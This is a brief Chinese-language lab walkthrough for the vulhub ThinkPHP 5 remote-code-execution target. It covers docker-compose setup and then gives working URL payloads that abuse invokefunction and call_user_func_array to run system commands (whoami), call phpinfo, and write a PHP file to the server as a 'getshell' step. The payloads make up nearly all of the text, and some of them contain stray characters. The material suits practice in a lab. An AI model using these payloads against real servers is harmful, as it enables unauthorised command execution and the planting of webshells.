1.環境搭建

vulhub/thinkphp/5-rce

docker-compose up -d

?2.訪問靶場

遠程命令執行：

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=whoami?

遠程代碼執行：

?? s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[ 1][]=-1

3.Getshell

? s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1] []=echo "<?php phpinfo();?>" >>1.php

方式二： 利用工具